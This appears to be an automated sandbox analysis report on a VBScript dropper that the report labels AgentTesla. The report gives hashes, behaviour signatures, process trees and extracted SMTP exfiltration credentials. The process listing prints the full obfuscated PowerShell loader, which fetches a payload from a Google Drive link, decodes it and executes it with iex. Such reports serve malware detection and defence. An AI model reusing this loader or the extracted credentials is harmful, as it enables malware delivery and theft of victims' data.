Analysis
-
max time kernel
142s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
23-05-2024 14:46
General
-
Target
836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs
-
Size
5KB
-
MD5
4f71bc91cc015856a2a5029d880f02f0
-
SHA1
3f9e609f67057c573a15f469e4bb5e64c571174c
-
SHA256
836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6
-
SHA512
30de245e61fd2cf7462a9e4949a04acfd17da6ffd074886d440b11f76bc4c28b336a9a5ced2785695fa8049348cc152d35b43ab487ff193e6f001a3d23243c38
-
SSDEEP
96:Q7ZrI+0JYJMAAiOL1vOZypNWiu/hlbz9cZh+xFUMLCT0MTUmdrQfp:Q150+GAAlOZypNWiu/hlPahKLCQMUhfp
Score
10/10
Malware Config
Extracted
Family
agenttesla
Credentials
Protocol: smtp- Host:
mail.blachownia.pl - Port:
587 - Username:
[email protected] - Password:
Zamowienia-2017 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 2 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious behavior: MapViewOfSection 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\836259b5e47a4d9f6fdd2955e69645b8aa70bca6d139b0eb99038641db38dbe6.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"3⤵
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semistarved = 1;$Fortrnges='Sub';$Fortrnges+='strin';$Fortrnges+='g';Function Bogievognenes83($Bldgringsmidler89){$Lovgav=$Bldgringsmidler89.Length-$Semistarved;For($Twentythree=1;$Twentythree -lt $Lovgav;$Twentythree+=2){$Irrigably+=$Bldgringsmidler89.$Fortrnges.Invoke( $Twentythree, $Semistarved);}$Irrigably;}function Kalkbrnderens($Chokprisers){.($Posedes) ($Chokprisers);}$Vgavis=Bogievognenes83 '.M,oIz i lElUaB/,5 . 0p ( W iin dKo.wSsT ,NhT, I1S0W. 0 ;E SW iHnI6.4p;A Ex 6P4,;D ,rFvE: 1,2U1,. 0O)D .GCe.c,k oV/D2 0S1 0N0V1R0m1L .F,iEr.e fgoPx,/H1r2,1 .v0B ';$Discrowning136=Bogievognenes83 'OU sGe r.-LASgSe,n tL ';$oplagre=Bogievognenes83 'BhGtUt.pSs :C/k/IdPrHiSv eL.Pg odoTgSl ev. c oMm./FuGcB?aeBx.p.o.rWtP=Sd,o wTnEl,oSa d.& i d,= 1R0GUGUce.zNT,z p HBZKcFo.M.wNW asrB5OfULOvRh.K jRmtqUrF0S1 mAbSfT ';$Flitwite=Bogievognenes83 'M>L ';$Posedes=Bogievognenes83 'TiSeAx ';$Bothriums='Eksemplarers';$Spatheful26 = Bogievognenes83 'De,cSh,oS % aDpSp,dFaAt.a %B\ RLuAhCa,a,rJe d e .STAa.lP &,&c IeScOh.oD tL ';Kalkbrnderens (Bogievognenes83 ' $,g l.o bEa l :UF o cBu.sFePsS= (,c mSd ./ cR $CSFp.aTt.hCe f,uPlO2D6,). ');Kalkbrnderens (Bogievognenes83 'B$ g lSo b aMl,: K a rMlGetk aSm rKe tF=P$Uo.pIl aHgIrPe,. s.p,l i t (,$IFVlGiDt w,iDt,eB) ');$oplagre=$Karlekamret[0];$Topvinklers= (Bogievognenes83 'F$TgBlIo bTaDlS:,S.oMlOoTeIr s,=ENPeBw,-AO b j,e,c t CSWyEsTt eLm .TNFe.t . WLe b C lci eUn,t');$Topvinklers+=$Focuses[1];Kalkbrnderens ($Topvinklers);Kalkbrnderens (Bogievognenes83 ' $ SWoBlGote rTsK.RH.e a dUeOr s [U$SDDi sFc rRoOw.ndiTnSg,1.3 6I].=S$BVPgEaBvIi.s ');$Rejen=Bogievognenes83 'T$DS,o lFo eNrSsp. DSoDwAn l oMaBd F.iGlOe.(N$Lo psl,aVg r,eS,D$DMOe gBa,lso,m.aMnbi cE) ';$Megalomanic=$Focuses[0];Kalkbrnderens (Bogievognenes83 ',$Pg lHo.bPaWlS:UWOhTiPsIkAiEnT=P(BTIe,sFtS- PHa t h .$ MSeAgEa,l o mPa n iMc,), ');while (!$Whiskin) {Kalkbrnderens (Bogievognenes83 ',$FgQl,oIbSa l :EFBo.rKt.u.n,aCtBe.lHy =S$,tVr,uSe ') ;Kalkbrnderens $Rejen;Kalkbrnderens (Bogievognenes83 ' S tAaBrOtA- S.l,e.eOpB 4 ');Kalkbrnderens (Bogievognenes83 'I$.g l,oSbNa.l,:VWKheiBs.k i nM= ( Tte sIt - PKaPt h, B$ M,eMgDaBlRoDmuaPn isc.), ') ;Kalkbrnderens (Bogievognenes83 'H$ gLlKoSb,aSlB: BBeSn vBa r m eSr ndeusN=P$bg,lAoLbra,l,: tFeSl eGf oPtGoPe t +D+,%.$ K aSr lSeHk aKmOrTeFt .Vc o uUn t, ') ;$oplagre=$Karlekamret[$Benvarmernes];}$Taximeters=346626;$resummon=26683;Kalkbrnderens (Bogievognenes83 'N$ gSl o b aPlD:PCPoMnWdPoUtSt iSe rBi. =G ,GSe.tV-CCCoCnmt e n.t, .$ MFe.gSaBl,oUmHa.n,isc ');Kalkbrnderens (Bogievognenes83 ' $Sg l.oAb a,l :NSStUrCaNnUg lBe,mfeAn tU R=C [AS,y s.tSe mD.HCgo nIvCe r t,]E: : FUrSo.mABFa s eS6 4PSBtSrLi n,gA(S$FC oTnLdSo t tMiKe.rAi,). ');Kalkbrnderens (Bogievognenes83 ' $SgDlLo b aRl : C hAa.m.b,e r e d, =F H[ESby s.t.eRm .TT eFx tC. E.n c,oUd i nBg,]T:O:HA,S CMITIT.,GFeMtKS t rri n.gX(.$FS tSrFaDn gHl e mAe,n tI) ');Kalkbrnderens (Bogievognenes83 'B$.g,l.o.bra lO:,VNaRlFu,t aMkJuLr sOe rS=.$.C h a mAb e,r eCd .Ls u,bHsStrrFiSnMgU(.$.T.aBxSi mMe,t eMr sB, $ r e s u,m,mPoKn ), ');Kalkbrnderens $Valutakurser;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ruhaarede.Tal && echo t"4⤵
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZW5X2BD2P810RGBHQK21.tempFilesize
7KB
MD54f3ed4a9cee1a22c34fd4130ffdf74d2
SHA1a4ad867174c2faa1009bfc8869c8ea7e94970136
SHA256f59b5633be8cda57b2f94b3a02eaa3cdfcbc0ff2cbf09f5af07a504de762423a
SHA512ce49b9f9a82009264de3943195d153d142749d79f73b39697687305ac085fb0995538a88cd07136c929e57da765847111f0c0afe58fd23ec1550a043a4249601
-
C:\Users\Admin\AppData\Roaming\Ruhaarede.TalFilesize
486KB
MD51bfa03c6f53315482c87ac075d5e4898
SHA1e2252b3662c2989cef2233e1d5fa7554bf8e5bd8
SHA256806ff71ceaf81fe7073d40617e7ccb34e4e9430fcccb5469c88e195e3c68eaf2
SHA51247e7a36d739e740f0b2d89694c1c670315b9efc29c4a710ddfab5f6aa2cdcbaaad605eec17ef33e3b53c2023a112eb2de09c3be6c2f6e59df404d337e68255a8
-
memory/2504-17-0x0000000006560000-0x00000000095F1000-memory.dmpFilesize
48.6MB
-
memory/2552-43-0x0000000000570000-0x00000000005B2000-memory.dmpFilesize
264KB
-
memory/2552-41-0x0000000000570000-0x00000000015D2000-memory.dmpFilesize
16.4MB
-
memory/2848-8-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-10-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-11-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-9-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-4-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmpFilesize
4KB
-
memory/2848-7-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-18-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-19-0x000007FEF5E8E000-0x000007FEF5E8F000-memory.dmpFilesize
4KB
-
memory/2848-6-0x0000000002690000-0x0000000002698000-memory.dmpFilesize
32KB
-
memory/2848-42-0x000007FEF5BD0000-0x000007FEF656D000-memory.dmpFilesize
9.6MB
-
memory/2848-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmpFilesize
2.9MB